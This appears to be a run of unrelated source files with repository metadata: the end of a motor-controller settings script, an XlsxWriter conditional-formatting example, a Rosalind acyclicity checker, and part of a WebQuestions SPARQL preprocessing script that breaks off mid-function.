result = lib.set_uart_settings(id, byref(uart_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
controller_name = controller_name_t()
controller_name.ControllerName = bytes([0, 113, 252, 118, 36, 0, 72, 0, 3, 0, 0, 0, 104, 101, 103, 0])
class CtrlFlags_:
EEPROM_PRECEDENCE = 1
result = lib.set_controller_name(id, byref(controller_name))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
emf_settings = emf_settings_t()
emf_settings.L = 0.013000000268220901
emf_settings.R = 2.5999999046325684
emf_settings.Km = 0.015599999576807022
class BackEMFFlags_:
BACK_EMF_KM_AUTO = 4
BACK_EMF_RESISTANCE_AUTO = 2
BACK_EMF_INDUCTANCE_AUTO = 1
result = lib.set_emf_settings(id, byref(emf_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
engine_advansed_setup = engine_advansed_setup_t()
engine_advansed_setup.stepcloseloop_Kw = 50
engine_advansed_setup.stepcloseloop_Kp_low = 1000
engine_advansed_setup.stepcloseloop_Kp_high = 33
result = lib.set_engine_advansed_setup(id, byref(engine_advansed_setup))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
extended_settings = extended_settings_t()
extended_settings.Param1 = 0
result = lib.set_extended_settings(id, byref(extended_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
stage_name = stage_name_t()
stage_name.PositionerName = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
result = lib.set_stage_name(id, byref(stage_name))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
stage_information = stage_information_t()
stage_information.Manufacturer = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
stage_information.PartNumber = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
result = lib.set_stage_information(id, byref(stage_information))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
stage_settings = stage_settings_t()
stage_settings.LeadScrewPitch = 0
stage_settings.Units = bytes([0, 0, 0, 0, 0, 0, 0, 0])
stage_settings.MaxSpeed = 0
stage_settings.TravelRange = 0
stage_settings.SupplyVoltageMin = 0
stage_settings.SupplyVoltageMax = 0
stage_settings.MaxCurrentConsumption = 0
stage_settings.HorizontalLoadCapacity = 0
stage_settings.VerticalLoadCapacity = 0
result = lib.set_stage_settings(id, byref(stage_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
motor_information = motor_information_t()
motor_information.Manufacturer = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
motor_information.PartNumber = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
result = lib.set_motor_information(id, byref(motor_information))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
motor_settings = motor_settings_t()
class MotorType_:
MOTOR_TYPE_BLDC = 3
MOTOR_TYPE_DC = 2
MOTOR_TYPE_STEP = 1
MOTOR_TYPE_UNKNOWN = 0
motor_settings.MotorType = MotorType_.MOTOR_TYPE_UNKNOWN
motor_settings.ReservedField = 0
motor_settings.Poles = 0
motor_settings.Phases = 0
motor_settings.NominalVoltage = 0
motor_settings.NominalCurrent = 0
motor_settings.NominalSpeed = 0
motor_settings.NominalTorque = 0
motor_settings.NominalPower = 0
motor_settings.WindingResistance = 0
motor_settings.WindingInductance = 0
motor_settings.RotorInertia = 0
motor_settings.StallTorque = 0
motor_settings.DetentTorque = 0
motor_settings.TorqueConstant = 0
motor_settings.SpeedConstant = 0
motor_settings.SpeedTorqueGradient = 0
motor_settings.MechanicalTimeConstant = 0
motor_settings.MaxSpeed = 0
motor_settings.MaxCurrent = 0
motor_settings.MaxCurrentTime = 0
motor_settings.NoLoadCurrent = 0
motor_settings.NoLoadSpeed = 0
result = lib.set_motor_settings(id, byref(motor_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
encoder_information = encoder_information_t()
encoder_information.Manufacturer = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
encoder_information.PartNumber = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
result = lib.set_encoder_information(id, byref(encoder_information))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
encoder_settings = encoder_settings_t()
encoder_settings.MaxOperatingFrequency = 0
encoder_settings.SupplyVoltageMin = 0
encoder_settings.SupplyVoltageMax = 0
encoder_settings.MaxCurrentConsumption = 0
encoder_settings.PPR = 0
class EncoderSettings_:
ENCSET_REVOLUTIONSENSOR_ACTIVE_HIGH = 256
ENCSET_REVOLUTIONSENSOR_PRESENT = 64
ENCSET_INDEXCHANNEL_PRESENT = 16
ENCSET_PUSHPULL_OUTPUT = 4
ENCSET_DIFFERENTIAL_OUTPUT = 1
result = lib.set_encoder_settings(id, byref(encoder_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
hallsensor_information = hallsensor_information_t()
hallsensor_information.Manufacturer = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
hallsensor_information.PartNumber = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
result = lib.set_hallsensor_information(id, byref(hallsensor_information))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
hallsensor_settings = hallsensor_settings_t()
hallsensor_settings.MaxOperatingFrequency = 0
hallsensor_settings.SupplyVoltageMin = 0
hallsensor_settings.SupplyVoltageMax = 0
hallsensor_settings.MaxCurrentConsumption = 0
hallsensor_settings.PPR = 0
result = lib.set_hallsensor_settings(id, byref(hallsensor_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
gear_information = gear_information_t()
gear_information.Manufacturer = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
gear_information.PartNumber = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
result = lib.set_gear_information(id, byref(gear_information))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
gear_settings = gear_settings_t()
gear_settings.ReductionIn = 0
gear_settings.ReductionOut = 0
gear_settings.RatedInputTorque = 0
gear_settings.RatedInputSpeed = 0
gear_settings.MaxOutputBacklash = 0
gear_settings.InputInertia = 0
gear_settings.Efficiency = 0
result = lib.set_gear_settings(id, byref(gear_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
accessories_settings = accessories_settings_t()
accessories_settings.MagneticBrakeInfo = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
accessories_settings.MBRatedVoltage = 0
accessories_settings.MBRatedCurrent = 0
accessories_settings.MBTorque = 0
class MBSettings_:
MB_POWERED_HOLD = 2
MB_AVAILABLE = 1
accessories_settings.TemperatureSensorInfo = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
accessories_settings.TSMin = 0
accessories_settings.TSMax = 0
accessories_settings.TSGrad = 0
class TSSettings_:
TS_AVAILABLE = 8
TS_TYPE_BITS = 7
TS_TYPE_SEMICONDUCTOR = 2
TS_TYPE_THERMOCOUPLE = 1
TS_TYPE_UNKNOWN = 0
accessories_settings.TSSettings = TSSettings_.TS_TYPE_UNKNOWN
class LimitSwitchesSettings_:
LS_SHORTED = 16
LS_SW2_ACTIVE_LOW = 8
LS_SW1_ACTIVE_LOW = 4
LS_ON_SW2_AVAILABLE = 2
LS_ON_SW1_AVAILABLE = 1
result = lib.set_accessories_settings(id, byref(accessories_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
return worst_result
| [
"[email protected]"
]
| |
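The profile function above only writes settings; it still needs an opened controller to act on. A hypothetical call site in the style of the usual libximc examples is sketched below, kept entirely in comments because the loader module, URI, and close call are assumptions rather than part of this file:

```python
# Hypothetical call site for set_profile_8MT195X_540_4 (sketch; all names
# below are assumptions based on typical libximc/pyximc usage).
# from pyximc import lib, Result, byref, cast, POINTER, c_int
# device_id = lib.open_device(b"xi-com:\\\\.\\COM1")   # assumed device URI
# worst = set_profile_8MT195X_540_4(lib, device_id)
# assert worst == Result.Ok
# lib.close_device(byref(cast(device_id, POINTER(c_int))))
```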
1aeaca94f2d4d9feb9733db3c8cad22d7ff94e80 | cf5b2850dc9794eb0fc11826da4fd3ea6c22e9b1 | /examples/conditional_format.py | 868eec6890126a075a32371064be80ab9628e826 | [
"BSD-2-Clause"
]
| permissive | glasah/XlsxWriter | bcf74b43b9c114e45e1a3dd679b5ab49ee20a0ec | 1e8aaeb03000dc2f294ccb89b33806ac40dabc13 | refs/heads/main | 2023-09-05T03:03:53.857387 | 2021-11-01T07:35:46 | 2021-11-01T07:35:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,956 | py | ###############################################################################
#
# Example of how to add conditional formatting to an XlsxWriter file.
#
# Conditional formatting allows you to apply a format to a cell or a
# range of cells based on certain criteria.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright 2013-2021, John McNamara, [email protected]
#
import xlsxwriter
workbook = xlsxwriter.Workbook('conditional_format.xlsx')
worksheet1 = workbook.add_worksheet()
worksheet2 = workbook.add_worksheet()
worksheet3 = workbook.add_worksheet()
worksheet4 = workbook.add_worksheet()
worksheet5 = workbook.add_worksheet()
worksheet6 = workbook.add_worksheet()
worksheet7 = workbook.add_worksheet()
worksheet8 = workbook.add_worksheet()
worksheet9 = workbook.add_worksheet()
# Add a format. Light red fill with dark red text.
format1 = workbook.add_format({'bg_color': '#FFC7CE',
'font_color': '#9C0006'})
# Add a format. Green fill with dark green text.
format2 = workbook.add_format({'bg_color': '#C6EFCE',
'font_color': '#006100'})
# Some sample data to run the conditional formatting against.
data = [
[34, 72, 38, 30, 75, 48, 75, 66, 84, 86],
[6, 24, 1, 84, 54, 62, 60, 3, 26, 59],
[28, 79, 97, 13, 85, 93, 93, 22, 5, 14],
[27, 71, 40, 17, 18, 79, 90, 93, 29, 47],
[88, 25, 33, 23, 67, 1, 59, 79, 47, 36],
[24, 100, 20, 88, 29, 33, 38, 54, 54, 88],
[6, 57, 88, 28, 10, 26, 37, 7, 41, 48],
[52, 78, 1, 96, 26, 45, 47, 33, 96, 36],
[60, 54, 81, 66, 81, 90, 80, 93, 12, 55],
[70, 5, 46, 14, 71, 19, 66, 36, 41, 21],
]
###############################################################################
#
# Example 1.
#
caption = ('Cells with values >= 50 are in light red. '
'Values < 50 are in light green.')
# Write the data.
worksheet1.write('A1', caption)
for row, row_data in enumerate(data):
worksheet1.write_row(row + 2, 1, row_data)
# Write a conditional format over a range.
worksheet1.conditional_format('B3:K12', {'type': 'cell',
'criteria': '>=',
'value': 50,
'format': format1})
# Write another conditional format over the same range.
worksheet1.conditional_format('B3:K12', {'type': 'cell',
'criteria': '<',
'value': 50,
'format': format2})
###############################################################################
#
# Example 2.
#
caption = ('Values between 30 and 70 are in light red. '
'Values outside that range are in light green.')
worksheet2.write('A1', caption)
for row, row_data in enumerate(data):
worksheet2.write_row(row + 2, 1, row_data)
worksheet2.conditional_format('B3:K12', {'type': 'cell',
'criteria': 'between',
'minimum': 30,
'maximum': 70,
'format': format1})
worksheet2.conditional_format('B3:K12', {'type': 'cell',
'criteria': 'not between',
'minimum': 30,
'maximum': 70,
'format': format2})
###############################################################################
#
# Example 3.
#
caption = ('Duplicate values are in light red. '
'Unique values are in light green.')
worksheet3.write('A1', caption)
for row, row_data in enumerate(data):
worksheet3.write_row(row + 2, 1, row_data)
worksheet3.conditional_format('B3:K12', {'type': 'duplicate',
'format': format1})
worksheet3.conditional_format('B3:K12', {'type': 'unique',
'format': format2})
###############################################################################
#
# Example 4.
#
caption = ('Above average values are in light red. '
'Below average values are in light green.')
worksheet4.write('A1', caption)
for row, row_data in enumerate(data):
worksheet4.write_row(row + 2, 1, row_data)
worksheet4.conditional_format('B3:K12', {'type': 'average',
'criteria': 'above',
'format': format1})
worksheet4.conditional_format('B3:K12', {'type': 'average',
'criteria': 'below',
'format': format2})
###############################################################################
#
# Example 5.
#
caption = ('Top 10 values are in light red. '
'Bottom 10 values are in light green.')
worksheet5.write('A1', caption)
for row, row_data in enumerate(data):
worksheet5.write_row(row + 2, 1, row_data)
worksheet5.conditional_format('B3:K12', {'type': 'top',
'value': '10',
'format': format1})
worksheet5.conditional_format('B3:K12', {'type': 'bottom',
'value': '10',
'format': format2})
###############################################################################
#
# Example 6.
#
caption = ('Cells with values >= 50 are in light red. '
'Values < 50 are in light green. Non-contiguous ranges.')
# Write the data.
worksheet6.write('A1', caption)
for row, row_data in enumerate(data):
worksheet6.write_row(row + 2, 1, row_data)
# Write a conditional format over a range.
worksheet6.conditional_format('B3:K6', {'type': 'cell',
'criteria': '>=',
'value': 50,
'format': format1,
'multi_range': 'B3:K6 B9:K12'})
# Write another conditional format over the same range.
worksheet6.conditional_format('B3:K6', {'type': 'cell',
'criteria': '<',
'value': 50,
'format': format2,
'multi_range': 'B3:K6 B9:K12'})
###############################################################################
#
# Example 7.
#
caption = 'Examples of color scales with default and user colors.'
data = range(1, 13)
worksheet7.write('A1', caption)
worksheet7.write('B2', "2 Color Scale")
worksheet7.write('D2', "2 Color Scale + user colors")
worksheet7.write('G2', "3 Color Scale")
worksheet7.write('I2', "3 Color Scale + user colors")
for row, row_data in enumerate(data):
worksheet7.write(row + 2, 1, row_data)
worksheet7.write(row + 2, 3, row_data)
worksheet7.write(row + 2, 6, row_data)
worksheet7.write(row + 2, 8, row_data)
worksheet7.conditional_format('B3:B14', {'type': '2_color_scale'})
worksheet7.conditional_format('D3:D14', {'type': '2_color_scale',
'min_color': "#FF0000",
'max_color': "#00FF00"})
worksheet7.conditional_format('G3:G14', {'type': '3_color_scale'})
worksheet7.conditional_format('I3:I14', {'type': '3_color_scale',
'min_color': "#C5D9F1",
'mid_color': "#8DB4E3",
'max_color': "#538ED5"})
###############################################################################
#
# Example 8.
#
caption = 'Examples of data bars.'
worksheet8.write('A1', caption)
worksheet8.write('B2', "Default data bars")
worksheet8.write('D2', "Bars only")
worksheet8.write('F2', "With user color")
worksheet8.write('H2', "Solid bars")
worksheet8.write('J2', "Right to left")
worksheet8.write('L2', "Excel 2010 style")
worksheet8.write('N2', "Negative same as positive")
data = range(1, 13)
for row, row_data in enumerate(data):
worksheet8.write(row + 2, 1, row_data)
worksheet8.write(row + 2, 3, row_data)
worksheet8.write(row + 2, 5, row_data)
worksheet8.write(row + 2, 7, row_data)
worksheet8.write(row + 2, 9, row_data)
data = [-1, -2, -3, -2, -1, 0, 1, 2, 3, 2, 1, 0]
for row, row_data in enumerate(data):
worksheet8.write(row + 2, 11, row_data)
worksheet8.write(row + 2, 13, row_data)
worksheet8.conditional_format('B3:B14', {'type': 'data_bar'})
worksheet8.conditional_format('D3:D14', {'type': 'data_bar',
'bar_only': True})
worksheet8.conditional_format('F3:F14', {'type': 'data_bar',
'bar_color': '#63C384'})
worksheet8.conditional_format('H3:H14', {'type': 'data_bar',
'bar_solid': True})
worksheet8.conditional_format('J3:J14', {'type': 'data_bar',
'bar_direction': 'right'})
worksheet8.conditional_format('L3:L14', {'type': 'data_bar',
'data_bar_2010': True})
worksheet8.conditional_format('N3:N14', {'type': 'data_bar',
'bar_negative_color_same': True,
'bar_negative_border_color_same': True})
###############################################################################
#
# Example 9.
#
caption = 'Examples of conditional formats with icon sets.'
data = [
[1, 2, 3],
[1, 2, 3],
[1, 2, 3],
[1, 2, 3],
[1, 2, 3, 4],
[1, 2, 3, 4, 5],
[1, 2, 3, 4, 5],
]
worksheet9.write('A1', caption)
for row, row_data in enumerate(data):
worksheet9.write_row(row + 2, 1, row_data)
worksheet9.conditional_format('B3:D3', {'type': 'icon_set',
'icon_style': '3_traffic_lights'})
worksheet9.conditional_format('B4:D4', {'type': 'icon_set',
'icon_style': '3_traffic_lights',
'reverse_icons': True})
worksheet9.conditional_format('B5:D5', {'type': 'icon_set',
'icon_style': '3_traffic_lights',
'icons_only': True})
worksheet9.conditional_format('B6:D6', {'type': 'icon_set',
'icon_style': '3_arrows'})
worksheet9.conditional_format('B7:E7', {'type': 'icon_set',
'icon_style': '4_arrows'})
worksheet9.conditional_format('B8:F8', {'type': 'icon_set',
'icon_style': '5_arrows'})
worksheet9.conditional_format('B9:F9', {'type': 'icon_set',
'icon_style': '5_ratings'})
workbook.close()
| [
"[email protected]"
]
| |
a7db3aafce35b88f549ace0cd7c17cbf0a387681 | 5005531655078e12546aba6b727dfa390acf3b2f | /src/python/dag.py | 0e5ed778d8ab13c47b050ed8443692b92c029af1 | []
| no_license | davidb2/rosalind | ee9201e2f79150a69389f702cf5926b42b6bce9f | c59930d3341e17d9f9f29c3b6c39d44f845d3215 | refs/heads/master | 2022-09-23T17:23:57.206469 | 2020-06-07T01:34:32 | 2020-06-07T01:34:32 | 187,707,621 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 977 | py | #!/usr/bin/env python3.6
import argparse
from queue import Queue
def acyclic(v, e, indeg, outdeg):
  # Kahn's algorithm: repeatedly dequeue zero-in-degree vertices; the
  # graph is acyclic iff every vertex is eventually removed.
unseen = set(range(1, v+1))
bfs = Queue()
for u in unseen:
if len(indeg[u]) == 0:
bfs.put(u)
while len(unseen) > 0:
if bfs.empty(): return False
top = bfs.get()
for out in outdeg[top]:
indeg[out].remove(top)
if len(indeg[out]) == 0:
bfs.put(out)
unseen.remove(top)
return True
def main(args):
k = int(input())
ans = []
for _ in range(k):
input()
v, e = tuple(map(int, input().split()))
indeg = {u: set() for u in range(1, v+1)}
outdeg = {u: set() for u in range(1, v+1)}
for _ in range(e):
a, b = tuple(map(int, input().split()))
indeg[b].add(a)
outdeg[a].add(b)
ans.append(+1 if acyclic(v, e, indeg, outdeg) else -1)
print(' '.join(map(str, ans)))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
args = parser.parse_args()
main(args)
| [
"[email protected]"
]
| |
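The expected stdin format for `main()` in the record above is undocumented; the example below is inferred from its parsing code (an assumption, added for illustration):

```python
# Example session for dag.py (input format inferred from main()):
#
#   2          <- k: number of graphs
#              <- blank line before each graph
#   3 2        <- v e
#   1 2
#   2 3
#              <- blank line
#   2 2        <- v e
#   1 2
#   2 1
#
# Output: "1 -1" (first graph is acyclic; second contains the cycle 1->2->1)
```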
3ce92a8f6ac6d21f309094192a22f27c0ba533f5 | 68dc6c82d1c8bd81b8aca375d71d18cc577aa350 | /TextRay/hybridqa/preprocessing/webq/trainDataGen.py | aed9db58d879509a1a5801b283ceadb587bde22c | []
| no_license | umich-dbgroup/TextRay-Release | 3fdbfefda9d6d94b70e810ceb2e0fa95a55949e0 | e25087b594db106382f5dbc9cd2adfcc39cd286f | refs/heads/master | 2022-01-25T19:03:44.577009 | 2019-08-16T13:00:00 | 2022-01-18T02:45:22 | 203,634,858 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,489 | py | import os
import json
from kbEndPoint.utils.sparql import sparqlUtils
from preprocessing import stringUtils
from preprocessing import metricUtils
import numpy as np
import nltk
import codecs
import pandas as pd
PREFIX = "/Users/funke/webq"
#
# RAW_QUESTION_PATH = os.path.join(PREFIX, "data/webquestions.examples.train.json")
# QUESTION_PATH = os.path.join(PREFIX, "data/train.json")
# SMART_TOPIC_PATH = os.path.join(PREFIX, "SMART/webquestions.examples.train.e2e.top10.filter.tsv")
# ALL_TOPIC_PATH = os.path.join(PREFIX, "topics/train.csv")
# CANDS_DIR = os.path.join(PREFIX, "cands-train")
# CANDS_WTIH_CONSTRAINTS_DIR = os.path.join(PREFIX, "cands_with_constraints-train")
# CANDS_WTIH_CONSTRAINTS_DIR_DEDUP = os.path.join(PREFIX, "cands_with_constraints-train")
# CANDS_WTIH_CONSTRAINTS_RESCALED_DIR = os.path.join(PREFIX, "cands_with_constraints_rescaled-train")
RAW_QUESTION_PATH = os.path.join(PREFIX, "data/webquestions.examples.test.json")
QUESTION_PATH = os.path.join(PREFIX, "data/test.json")
CANDS_DIR = os.path.join(PREFIX, "cands-test")
CANDS_WTIH_CONSTRAINTS_DIR = os.path.join(PREFIX, "cands_with_constraints-test")
CANDS_WTIH_CONSTRAINTS_DIR_DEDUP = os.path.join(PREFIX, "cands_with_constraints-test")
SMART_TOPIC_PATH = os.path.join(PREFIX, "SMART/webquestions.examples.test.e2e.top10.filter.tsv")
ALL_TOPIC_PATH = os.path.join(PREFIX, "topics/test.csv")
CANDS_WTIH_CONSTRAINTS_RESCALED_DIR = os.path.join(PREFIX, "cands_with_constraints_rescaled-test")
ANS_CONSTRAINT_RELATIONS = ["people.person.gender", "common.topic.notable_types", "common.topic.notable_for"]
class Constraint(object):
def __init__(self, mid, name, relation, is_ans_constraint, surface_form, st_pos, length):
self.mid = mid
self.name =name
self.relation = relation
self.is_ans_constraint = is_ans_constraint
self.surface_form = surface_form
self.st_pos = st_pos
self.length = length
def __str__(self):
return str(self.mid) + " " + str(self.name) + " " + str(self.relation) + " " + str(self.is_ans_constraint)
class Smart_Entity(object):
def __init__(self, line):
split_line = line.strip().split('\t')
self.q_id = split_line[0]
self.surface_form = split_line[1]
self.st_pos = int(split_line[2])
self.length = int(split_line[3])
mid = split_line[4]
if mid.startswith('/'):
mid = mid[1:].replace('/', '.')
self.mid = mid
self.e_name = split_line[5]
self.score = float(split_line[6])
def __str__(self):
return str(self.surface_form) + " (" + str(self.mid) + "," + str(self.e_name) + ")"
class WebQuestionsEndPoint(object):
def __init__(self):
self.sparql = sparqlUtils()
self.topic_entity_dict = {}
self.cache_maxsize = 10000
self.cvt_constraints_cache = {}
self.cvt_constraints_cache_elements_fifo = []
self.topic_entity_dict = {}
self.type_dict = {}
self.type_name_dict = {}
self.all_path_entity_cache = {}
self.entity_name_cache={}
def write_top_entities(self, entity_linking_path, ques_src, dest_topic_path):
names = ['ques_id', 'mention', 'begin_index', 'length', 'mid', 'name', 'score']
df = pd.read_csv(entity_linking_path, delimiter='\t', names=names)
df = df.dropna()
df['mid'] = df['mid'].apply(lambda mid: mid[1:].replace('/', '.'))
df = df.sort_values(['ques_id', 'score'], ascending=[True, False])
df = df.drop_duplicates(subset=['ques_id', 'mid'])
# df = df.groupby('ques_id').reset_index(drop=True)
df.to_csv(dest_topic_path, index=False, encoding='utf-8')
def get_cands(self, ques_src, topic_src, dest_dir):
if not os.path.exists(dest_dir):
os.mkdir(dest_dir)
topics_df = pd.read_csv(topic_src)
file_json = json.load(open(ques_src, 'r'))
questions = file_json
for question in questions:
questionId = question["QuestionId"]
# if questionId != "WebQTrn-158":
# continue
print questionId
dest_path = os.path.join(dest_dir, questionId + ".json")
if os.path.exists(dest_path):
continue
topic_entities = topics_df[topics_df["ques_id"] == questionId].to_dict(orient='records')
candidates = {}
for e in topic_entities:
topic_entity = e['mid']
if topic_entity in self.all_path_entity_cache:
cands = self.all_path_entity_cache[topic_entity]
print ("found")
else:
# print(topic_entity)
cands = []
one_step = self.sparql.one_hop_expansion(topic_entity)
for cand in one_step:
relations = [cand[0]]
cands.append({"relations": relations, "counts": cand[1],
"entities": self.sparql.eval_one_hop_expansion(topic_entity, rel1=cand[0])})
two_step = self.sparql.two_hop_expansion(topic_entity)
for cand in two_step:
relations = [cand[0], cand[1]]
cands.append({"relations": relations, "counts": cand[2],
"entities": self.sparql.eval_two_hop_expansion(topic_entity, rel1=cand[0], rel2=cand[1])})
candidates[topic_entity] = cands
self.all_path_entity_cache[topic_entity] = cands
with open(dest_path, 'w+') as fp:
json.dump(candidates, fp, indent=4)
'''Add core constraints'''
def generate_query_graph_cands(self, ques_src, topic_src, core_chain_path, dest_dir):
topics_df = pd.read_csv(topic_src)
questions = json.load(open(ques_src, 'r'))
ans_dict = {}
ques_str_dict = {}
for question in questions:
qid = question["QuestionId"]
ques_str_dict[qid] = question["ProcessedQuestion"]
ans_dict[qid] = question['Answers']
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
files = [f for f in os.listdir(core_chain_path) if os.path.isfile(os.path.join(core_chain_path, f))]
for f in files:
if ".DS_Store" in f:
continue
q_id = f.replace(".json", "")
ques_string = ques_str_dict[q_id]
if os.path.exists(os.path.join(dest_dir, q_id + ".json")):
print("exists " + str(q_id))
continue
ques_query_graph_cands = {}
try:
file_json = json.load(open(os.path.join(core_chain_path, f), 'r'))
except:
print(f)
continue
links_df = topics_df[topics_df["ques_id"] == q_id]
links = links_df.to_dict(orient='records')
print("Question " + q_id)
for mid in file_json.keys():
topic_entity_names = links_df[links_df['mid'] == mid]['mid'].values
if len(topic_entity_names) == 0:
print('should have a topic entity name in topics path {}'.format(mid))
continue
print(mid)
topic_entity_name = topic_entity_names[0]
answers = ans_dict[q_id]
paths = file_json[mid]
entity_query_graph_cands = []
for path in paths:
main_relation = path["relations"]
print main_relation
constraints = self.__get_constraint_candidates__(ques_string, mid, topic_entity_name, main_relation, links)
cands = self.__get_query_graph_cands__(mid, main_relation, constraints, answers)
entity_query_graph_cands.extend(cands)
ques_query_graph_cands[mid] = entity_query_graph_cands
print("topic {} candidates size {}".format(mid, len(entity_query_graph_cands)))
with open(os.path.join(dest_dir, q_id + ".json"), 'w+') as fp:
json.dump(ques_query_graph_cands, fp, indent=4)
def _add_cvt_to_cache(self, cvt_key, cvt_paths):
self.cvt_constraints_cache_elements_fifo.append(cvt_key)
self.cvt_constraints_cache[cvt_key] = cvt_paths
if len(self.cvt_constraints_cache_elements_fifo) > self.cache_maxsize:
to_delete = self.cvt_constraints_cache_elements_fifo.pop(0)
del self.cvt_constraints_cache[to_delete]
def __get_constraint_candidates__(self, ques_str, topic_entity, topic_entity_name, relation_path, links):
candidates = []
for link in links:
if metricUtils.jaccard_ch(topic_entity_name.lower(), link["mention"].lower()) > 0.4: continue
if link["mid"] == topic_entity: continue
if len(relation_path) == 2:
rel_key = str(relation_path)
if rel_key in self.cvt_constraints_cache:
cvt_constraints = self.cvt_constraints_cache[rel_key]
else:
cvt_constraints = self.sparql.get_all_cvt_constraints(topic_entity, relation_path, False, link["mid"])
self._add_cvt_to_cache(rel_key, cvt_constraints)
for rel in cvt_constraints:
candidates.append(Constraint(link["mid"], link["name"], rel, False, link["mention"], link["begin_index"], link["length"]))
relation_id = str(relation_path)
if relation_id in self.type_dict:
type_mids_rels = self.type_dict[relation_id]
else:
type_mids_rels = self.sparql.get_ans_constraint_candidates(topic_entity, relation_path, ANS_CONSTRAINT_RELATIONS, False)
self.type_dict[relation_id] = type_mids_rels
for mid in type_mids_rels.keys():
if mid in self.type_name_dict:
names = self.type_name_dict[mid]
else:
names = self.sparql.get_names(mid)
self.type_name_dict[mid] = names
if names is None or len(names) == 0:
continue
match = stringUtils.match_names_to_mention(ques_str, names.split("/"))
if match is None:
continue
candidates.append(Constraint(mid, names, type_mids_rels[mid], True, match[0], match[1], match[1] + match[2]))
return candidates
def __get_query_graph_cands__(self, topic_entity, main_relation, constraints, ans_entities):
constraint_combinations = self.__get_constraint_combinations__(constraints)
answer_entities = set(ans_entities)
cands = []
for combination in constraint_combinations:
entity_names = set(self.sparql.eval_all_constraints_named(topic_entity, main_relation, combination, False))
# entity_names = set()
# for e in entities:
# if e in self.entity_name_cache:
# entity_names.add(self.entity_name_cache[e])
# else:
# entity_name = self.sparql.get_names(e)
# self.entity_name_cache[e] = entity_name
# entity_names.add(entity_name)
# common = entities.intersection(answer_entities)
# reward = float(len(common)) / max(1.0, (len(entities) + len(answer_entities) - len(common)))
if len(answer_entities) == 0:
reward = 0,0,0
else:
reward = metricUtils.compute_f1(answer_entities, entity_names)
cand = {"relations": main_relation,
"entities": list(entity_names),
"constraints": [ob.__dict__ for ob in combination],
"reward": reward}
cands.append(cand)
return cands
def __get_constraint_combinations__(self, constraint_candidates):
if len(constraint_candidates) == 0:
return [[]]
elif len(constraint_candidates) == 1:
return [[], [constraint_candidates[0]]]
conflicts = self.__get_conflicts__(constraint_candidates)
constraint_combinations = self.__dfs_search_combinations__(conflicts)
cand_lists = []
cand_lists.append([])
for constraint_combination in constraint_combinations:
cand_list = [constraint_candidates[i] for i in constraint_combination]
cand_lists.append(cand_list)
return cand_lists
def __get_conflicts__(self, constraint_candidates):
cand_size = len(constraint_candidates)
conflict_matrix = []
# conflict matrix (adjacent format)
for i in range(cand_size):
vec = [i]
for j in range(i + 1, cand_size):
cand_1 = constraint_candidates[i]
cand_2 = constraint_candidates[j]
conflict = cand_1.st_pos <= cand_2.st_pos + cand_2.length \
and cand_2.st_pos <= cand_1.st_pos + cand_1.length
if conflict: vec.append(j)
conflict_matrix.append(vec)
return conflict_matrix
def __dfs_search_combinations__(self, mat):
ret_comb_list = []
n = len(mat)
status = np.ones((n,), dtype='int32')
stack = []
ptr = -1
while True:
ptr = self.__nextPick__(ptr, status)
if ptr == -1: # backtrace: restore status array
